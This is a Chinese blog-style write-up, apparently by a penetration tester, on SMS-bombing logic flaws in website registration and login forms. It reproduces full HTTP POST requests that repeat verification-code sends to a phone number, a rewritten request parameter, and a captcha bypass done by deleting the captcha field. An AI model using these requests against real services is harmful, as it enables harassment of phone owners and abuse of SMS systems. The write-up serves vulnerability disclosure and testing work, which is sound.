IT数码 购物 网址 头条 软件 日历 阅读 图书馆
TxT小说阅读器
↓语音阅读,小说下载,古典文学↓
图片批量下载器
↓批量下载图片,美女图库↓
图片自动播放器
↓图片自动播放器↓
一键清除垃圾
↓轻轻一点,清除系统垃圾↓
开发: C++知识库 Java知识库 JavaScript Python PHP知识库 人工智能 区块链 大数据 移动开发 嵌入式 开发工具 数据结构与算法 开发测试 游戏开发 网络协议 系统运维
教程: HTML教程 CSS教程 JavaScript教程 Go语言教程 JQuery教程 VUE教程 VUE3教程 Bootstrap教程 SQL数据库教程 C语言教程 C++教程 Java教程 Python教程 Python3教程 C#教程
数码: 电脑 笔记本 显卡 显示器 固态硬盘 硬盘 耳机 手机 iphone vivo oppo 小米 华为 单反 装机 图拉丁
 
   -> 网络协议 -> 短信逻辑漏洞 -> 正文阅读

[网络协议]短信逻辑漏洞

文章目录


注:文章相关法规要求,有些词汇不能显示,经修改后重新发布,真实为短信hz漏洞

示例1

在这里插入图片描述
在这里插入图片描述
发送到爆破模块,修改POST请求内容
在这里插入图片描述

POST /registerform HTTP/1.1
Host: www.xxx.com.cn
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Referer: https://www.xxx.com.cn/
Content-Length: 234
Cookie: JSESSIONID=Oi3MkNsPbGbN_DVulKs755X7.win-o64vuqqq6d9
DNT: 1
Connection: close

busiNo=system.sendCodeBo&param={"message":"1xxxxxxxxxx","type":3}

这里发送20条数据,正好这里短信发送的上限也是20条
在这里插入图片描述
注:关于POST请求内容修改

busiNo=system.ZhuceBo&param=%7B%22namee%22%3A%22参数%22%2C%22pwd%22%3A%22参数%22%2C%22tzztype%22%3A%221%22%2C%22tel%22%3A%22手参数%22%2C%22email%22%3A%22参数%22%2C%22code%22%3A%222222%22%7D

到

busiNo=system.sendCodeBo&param={"message":"1xxxxxxxxxx","type":3}

上面的内容是根据网页源码进行修改
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
注:政策原因,这里就不放收到的短信信息

示例2

在这里插入图片描述
这里请求包什么都不用修改,直接爆破即可
注:政策原因,这里就不放收到的短信信息

示例3

在这里插入图片描述
在这里插入图片描述

注:如果不修改POST传参种的120,就会失败,下图是未修改且攻击失败的返回包
在这里插入图片描述

更新:这里遇到个比较有趣的,此处漏洞修复后,设置了登陆界面发送短信验证码的功能点和设置短信发送次数限制,可是对他进行复测时,这个新加的功能点也变成了漏洞,即验证码绕过,爆破时如果你图片验证码不正确会提示图片验证码不正确,但如果你删了这个请求的参数,依然可以爆破,这…直接上图吧
使用验证码爆破

POST /query/service.yachtar HTTP/1.1
Host: xxx.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/json;charset=UTF-8
X-Requested-With: XMLHttpRequest
Referer: http://xxx.com/query/jumpView.yachtar?menu=validate4apply
Content-Length: 113
Cookie: JSESSIONID=EF87135A9B0697BBA5B80DB8FD1C45AD
DNT: 1
Connection: close

{"pram":{"receiver":"手机号","tel":"手机号","seconds":0,"checkid":"ewmd"},"request_type":7,"data":null}

在这里插入图片描述

在这里插入图片描述
图片验证码绕过爆破

POST /query/service.yachtar HTTP/1.1
Host: xxx.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/json;charset=UTF-8
X-Requested-With: XMLHttpRequest
Referer: http://xxx.com/query/jumpView.yachtar?menu=validate4apply
Content-Length: 96
Cookie: JSESSIONID=9DD1307CA8A0C1831496F1CB64005C8A
DNT: 1
Connection: close

{"pram":{"receiver":"手机号","tel":"手机号","seconds":0},"request_type":7,"data":null}

在这里插入图片描述

在这里插入图片描述
在这里插入图片描述
注:政策原因,这里就不放收到的短信信息

  网络协议 最新文章
使用Easyswoole 搭建简单的Websoket服务
常见的数据通信方式有哪些?
Openssl 1024bit RSA算法---公私钥获取和处
HTTPS协议的密钥交换流程
《小白WEB安全入门》03. 漏洞篇
HttpRunner4.x 安装与使用
2021-07-04
手写RPC学习笔记
K8S高可用版本部署
mySQL计算IP地址范围
上一篇文章      下一篇文章      查看所有文章
加:2021-09-05 11:23:21  更:2021-09-05 11:24:44 
 
开发: C++知识库 Java知识库 JavaScript Python PHP知识库 人工智能 区块链 大数据 移动开发 嵌入式 开发工具 数据结构与算法 开发测试 游戏开发 网络协议 系统运维
教程: HTML教程 CSS教程 JavaScript教程 Go语言教程 JQuery教程 VUE教程 VUE3教程 Bootstrap教程 SQL数据库教程 C语言教程 C++教程 Java教程 Python教程 Python3教程 C#教程
数码: 电脑 笔记本 显卡 显示器 固态硬盘 硬盘 耳机 手机 iphone vivo oppo 小米 华为 单反 装机 图拉丁

360图书馆 购物 三丰科技 阅读网 日历 万年历 2024年11日历 -2024/11/15 7:52:49-

图片自动播放器
↓图片自动播放器↓
TxT小说阅读器
↓语音阅读,小说下载,古典文学↓
一键清除垃圾
↓轻轻一点,清除系统垃圾↓
图片批量下载器
↓批量下载图片,美女图库↓
  网站联系: qq:121756557 email:121756557@qq.com  IT数码